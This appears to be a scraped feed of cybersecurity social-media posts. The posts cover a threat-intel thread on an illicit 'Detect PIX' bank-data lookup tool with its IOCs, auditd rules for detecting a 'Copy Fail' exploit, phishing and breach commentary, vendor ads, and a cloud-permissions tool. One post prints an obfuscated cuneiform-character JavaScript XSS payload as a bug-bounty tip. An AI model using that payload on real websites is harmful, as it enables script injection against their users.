CTI Thread | Threat Analysis — Detect PIX Tool and Associated Domain
1/7.
The material documents the operational use of a desktop tool named “Detect PIX” (client detect_pix.py + “Key Generator” interface), designed for unauthorized bulk queries of PIX keys linked to CPFs and phone numbers.
The system returns complete bank account data: account holder name, CPF, financial institution, branch, account number, PIX key type, and status (active/inactive).
2/7 Identified infrastructure: • Backend: 194.163.139.230:3891 • Hostname: https://t.co/o56atrdjST • Provider: Contabo GmbH (AS51167) • Location: data center in Lauterbourg, France
Correlated domain: https://t.co/yctNVJfXZk — a web platform commercializing the same type of query (R$ 0.50 per phone number), featuring a queue system, access tokens, and prepaid balance.
3/7 In the recorded session, 4,162 CPFs were processed in approximately 34 seconds (multi-threading). Results: 964 records with complete banking data, 1,488 inactive, and 2,954 with no return.
4/7 The granularity and volume of the responses are incompatible with legitimate access to the DICT (Directory of Transactional Account Identifiers) of the Central Bank of Brazil.
The DICT has strict rate-limiting policies specifically designed to prevent scanning. The observed architecture (desktop client + temporary tokens + proxy on a foreign VPS) indicates an unauthorized intermediary.
5/7 Preliminary legal framework (Brazil): • Violation of the LGPD (Law 13.709/2018) — unlawful processing of sensitive personal data. • Article 154-A of the Penal Code — invasion of a computer device. • Possible additional classification under crimes against the financial system and criminal association, depending on the use of the data.
6/7 Indicators of Compromise (IOCs): • IP 194.163.139.230 • Hostname https://t.co/o56atrdjST • Domain https://t.co/yctNVJfXZk • Strings and files: detect_pix.py, “Key Generator — Detect PIX”, exportados/bancos/ folders, bank naming patterns.
Recommendation: block the IP and monitor connections to port 3891, in addition to formal notification to the provider Contabo ([email protected]).
7/7 Conclusion: this is a mature tool from the Brazilian underground ecosystem facilitating PIX-related fraud.
#CyberSecurity #ThreatIntel #OSINT #CTI #InfoSec #PIXFraud #Cybercrime #LGPD #FinancialFraud #Brazil #DICT #CentralBank
Analisei a nova onda de campanhas de e-mail que abandona links e usa arquivos SVG limpos. O ataque usa o MIME type application/ecmascript para burlar SEGs e monta o payload via XOR direto na memória do navegador.
https://t.co/w6O5DbRELT
You can detect Copy Fail exploitation with the following auditd rules:
-a always,exit -F arch=b64 -S bind -F a2=88 -F key=alg_bind
-a always,exit -F arch=b64 -S setsockopt -F a1=279 -F key=alg_setsockopt
The exploit binds to this saddr once for each 4 bytes of the shellcode. So, if you see like 30-40 of these, it's probably a bad guy.
#DetectionEngineering
Atacantes não tiram férias. 🛡️💻
Analisei o breach da Vercel: o risco real foi o Shadow IT. Um app de IA de terceiros via OAuth serviu de ponte para comprometer o Google Workspace e variáveis de ambiente.
Análise técnica completa aqui: https://t.co/c3nZxQVZo9 🧵
We break modern systems to help organizations defend better.
At Cysource, we focus on penetration testing and GenAI / LLM security for organizations operating in high-risk environments.
We simulate real adversaries, not compliance exercises — validating how modern attacks actually bypass controls, abuse AI systems and impact business workflows.
Our work supports security leaders who need clarity, not noise:
what is exploitable, what really matters, and what must be fixed first.
Engagements range from deep-dive security assessments to focused, hands-on workshops designed to transfer field-tested knowledge.
If you’re deploying AI, APIs or complex cloud systems — this is the layer where security is usually misunderstood.
Publiquei um novo post no Linkedin, dessa vez sobre como arquivos ZIP podem ser usados para invadir sistemas e como evitar armadilhas digitais e se proteger.
https://t.co/NGoKnvPGnV
an XSS payload, Cuneiform-alphabet based
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
#bugbounty#bugbountytips#cybersecurity
🚀 #ANYRUN’s new Android OS empowers #SOC teams to analyze APKs in real time, uncover fresh IOCs, and reduce #cybersecurity costs.
🎥 See it in action and dive into mobile #malware analysis: https://t.co/7xt2aeeTQK
🎁 Explore #ANYRUN's Birthday offers: https://t.co/OrN1fwCxeZ
AWSPEAS (https://t.co/oQfy7RHFhj) maps what AWS creds can do: reads IAM, simulates calls & brute-forces perms, then flags risks via HackTricksAI.
Essential for Red Team/Pentest ops.
#cloudpeass#AWS#CloudSecurity